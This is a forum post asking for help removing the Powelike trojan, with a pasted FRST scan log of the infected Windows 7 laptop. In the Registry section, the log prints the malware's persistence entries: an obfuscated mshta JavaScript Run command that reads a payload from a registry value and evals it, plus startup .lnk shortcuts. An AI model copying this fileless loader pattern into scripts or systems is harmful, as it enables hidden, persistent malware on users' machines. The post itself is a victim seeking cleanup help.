Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help Removing Powelike!lnk Trojan


  • This topic is locked This topic is locked
26 replies to this topic

#1 pmate888

pmate888

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 16 October 2016 - 05:54 PM

I fell fictim to a fake Firefox update and infected my laptop with the Powelike!lnk trojan on Sat 10/5/16.  McAfee on-access scanner detects the trojan and deletes it every few seconds but it keeps coming back.

I ran FRST (fix) and ESET Powelike Cleaner (nothing found) and Rkill (nothing found) but the Trojan keeps coming back.  Also ran McAfee scan (nothing found), Malwarebytes (free ver) and Microsoft Malicious Software Removal tool which found some items but the Powelike!lnk trojan keeps coming back.

Here is the result from FRST (scan) FRST.txt file:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16-10-2016

Ran by Wayne (administrator) on WWX220 (16-10-2016 11:59:21)

Running from C:\Users\Wayne\Desktop

Loaded Profiles: Wayne (Available Profiles: Wayne)

Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: FF)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe

(Intel® Corporation) C:\Program Files\Intel\CAM\bin\CAMService.exe

(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(Lenovo.) C:\Windows\System32\TpShocks.exe

() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe

(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE

(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe

(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe

(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe

(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe

() C:\Program Files (x86)\Lenovo\System Update\SUService.exe

(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe

(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe

(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_23_0_0_185.exe

(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_23_0_0_185.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

 

 

==================== Registry (Whitelisted) ====================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-01-14] (Lenovo.)

HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()

HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2011-03-14] (Conexant systems, Inc.)

HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)

HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63656 2016-02-19] (Lenovo)

HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [113656 2013-07-02] (Intel Corporation)

HKLM-x32\...\Run: [PWMTRV] => C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL [6422696 2016-04-14] (Lenovo Group Limited)

HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot

HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)

HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)

HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)

HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-23] (Google Inc.)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**npfolr<*>] => "C:\Windows\system32\mshta.exe" javascript:kOer93kVe="gV8";YH7=new%20ActiveXObject("WScript.Shell");EQ6ORLQ="P";Y8Xx3V=YH7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");dS8UOEZo="JW2r1GN";eval(Y8Xx3V);s (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [**ypqwknh<*>] => "C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk" <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {adad7ac6-fdcf-11e0-aba0-806e6f6e6963} - Q:\LenovoQDrive.exe

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\MountPoints2: {b16e947a-43af-11e5-863b-f0def19d1112} - D:\LaunchU3.exe

Startup: C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\472856.lnk [2016-10-16]

ShortcutTarget: 472856.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{BBACEA73-8644-4A74-A026-251E28C5AC0C}: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{F3EAF862-B2B2-4EA5-8BBC-6869F9E0D984}: [DhcpNameServer] 24.25.227.55 209.18.47.61

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=LENP&bmod=LENP

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://www.lenovo.com/welcome/thinkpad

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458

SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458

BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)

BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)

BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll [2011-04-13] (Symantec Corporation)

BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2015-02-06] (Oracle Corporation)

BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)

BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)

BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)

BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll [2011-04-13] (Symantec Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2015-02-06] (Oracle Corporation)

Toolbar: HKLM - No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)

Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)

Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)

Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} -  No File

DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab

DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)

Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)

 

FireFox:

========

FF ProfilePath: C:\Users\Wayne\AppData\Roaming\Mozilla\Firefox\Profiles\lh4xbcbb.default [2016-10-16]

FF DefaultSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google

FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google

FF SelectedSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default ->

FF Homepage: Mozilla\Firefox\Profiles\lh4xbcbb.default -> hxxps://www.google.com/

FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]

FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client

FF Extension: (Symantec VIP Access Add-On) - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-23] [not signed]

FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore

FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2015-12-29] [not signed]

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-15] ()

FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()

FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIIPT.dll [2014-07-09] (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIUpdater.dll [2014-07-09] (Intel Corporation)

FF Plugin-x32: @java.com/DTPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-06] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2015-02-06] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)

 

Chrome:

=======

CHR DefaultProfile: Default

CHR Profile: C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default [2016-10-15]

CHR Extension: (Google Slides) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-29]

CHR Extension: (Google Docs) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-29]

CHR Extension: (Google Drive) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-28]

CHR Extension: (YouTube) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-18]

CHR Extension: (Google Search) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]

CHR Extension: (Google Sheets) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-29]

CHR Extension: (Google Docs Offline) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-28]

CHR Extension: (Skype) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-15]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-28]

CHR Extension: (Gmail) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]

CHR Extension: (Chrome Media Router) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-15]

CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)

R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)

R2 CAMService; C:\Program Files\Intel\CAM\bin\CAMService.exe [1243344 2014-09-03] (Intel® Corporation)

S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)

S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\LENOVO\easyplussdk\bin\EPHotspot64.exe [619776 2015-01-15] (Lenovo)

R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-06] (Lenovo Group Limited)

S2 LPlatSvc; C:\Windows\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)

S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)

R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)

R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2015-12-29] (McAfee, Inc.)

R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208936 2015-08-20] (McAfee, Inc.)

R2 mfevtp; C:\Windows\system32\mfevtps.exe [254792 2015-12-29] (McAfee, Inc.)

S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-12-04] ()

R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2012-03-05] (Lenovo Group Limited)

R3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28544 2016-09-10] ()

R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)

R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-12-04] (Intel® Corporation)

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)

R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [412440 2015-12-29] (McAfee, Inc.)

R3 mfeaacsk; C:\Windows\System32\drivers\mfeaacsk.sys [64416 2015-12-29] (McAfee, Inc.)

R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [347800 2015-12-29] (McAfee, Inc.)

U3 mfeavfk01; no ImagePath

R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496888 2015-12-29] (McAfee, Inc.)

R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [875928 2015-12-29] (McAfee, Inc.)

R3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [66080 2015-12-29] (McAfee, Inc.)

S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [114880 2015-12-29] (McAfee, Inc.)

R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344704 2015-12-29] (McAfee, Inc.)

S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-23] ()

R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)

R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-16 11:59 - 2016-10-16 12:00 - 00024867 _____ C:\Users\Wayne\Desktop\FRST.txt

2016-10-16 11:59 - 2016-10-16 11:59 - 00000000 ____D C:\Users\Wayne\Desktop\FRST-OlderVersion

